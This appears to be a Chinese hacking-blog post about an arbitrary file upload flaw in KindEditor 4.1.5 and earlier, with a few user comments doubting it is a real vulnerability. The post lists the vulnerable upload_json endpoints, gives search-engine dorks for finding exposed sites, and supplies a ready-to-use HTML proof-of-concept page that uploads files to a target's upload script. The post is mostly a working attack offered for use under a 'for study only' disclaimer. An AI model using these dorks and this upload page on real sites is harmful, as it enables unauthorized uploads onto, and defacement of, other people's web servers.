kindeditor<=4.1.5 文件上传漏洞

  • 内容
  • 相关

漏洞存在于 kindeditor 编辑器里,你能上传. txt 和. html 文件,支持 php/asp/jsp/asp.net

漏洞存在于小于等于 kindeditor4.1.5 编辑器中

根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_json.* 的存在

/asp/upload_json.asp
/asp.net/upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php

关键字:

allinurl:/examples/uploadbutton.html

allinurl:/php/upload_json.php / .asp / .jsp

poc

<html><head>

<title>kindeditor<=4.1.5文件上传</title>

<script src="https://www.0dayhack.com/kindeditor/kindeditor-min.js"></script>

<script>

KindEditor.ready(function(K) {

var uploadbutton = K.uploadbutton({

button : K('#uploadButton')[0],

fieldName : 'imgFile',

url : 'https://www.0dayhack.com/kindeditor/asp/upload_json.asp?dir=file',

afterUpload : function(data) {

if (data.error === 0) {

var url = K.formatUrl(data.url, 'absolute');

K('#url').val(url);}

},

});

uploadbutton.fileBox.change(function(e) {

uploadbutton.submit();

});

});

</script></head><body>

<div class="upload">

<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />

<input type="button" id="uploadButton" value="Upload" />

</div>

</body>

</html>

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:kindeditor<=4.1.5 文件上传漏洞 - https://www.0dayhack.com/post-799.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

3条评论
  1. avatar

    你的戒指 Lv.1 Firefox 62.0 Firefox 62.0 Windows 8.1 x64 Edition Windows 8.1 x64 Edition 回复

    狗P不通 这算什么漏洞

    江苏省常州市 电信

    1. 吾是你爸爸 Lv.1 Chrome 76.0.3809.132 Chrome 76.0.3809.132 Windows Windows 回复

      回复了你的戒指:你的屁通

      北京市海淀区 联通

  2. avatar

    阿萨德 Lv.1 Chrome 63.0.3239.132 Chrome 63.0.3239.132 Windows 7 x64 Edition Windows 7 x64 Edition 回复

    这算是漏洞?

    菲律宾 Globe电信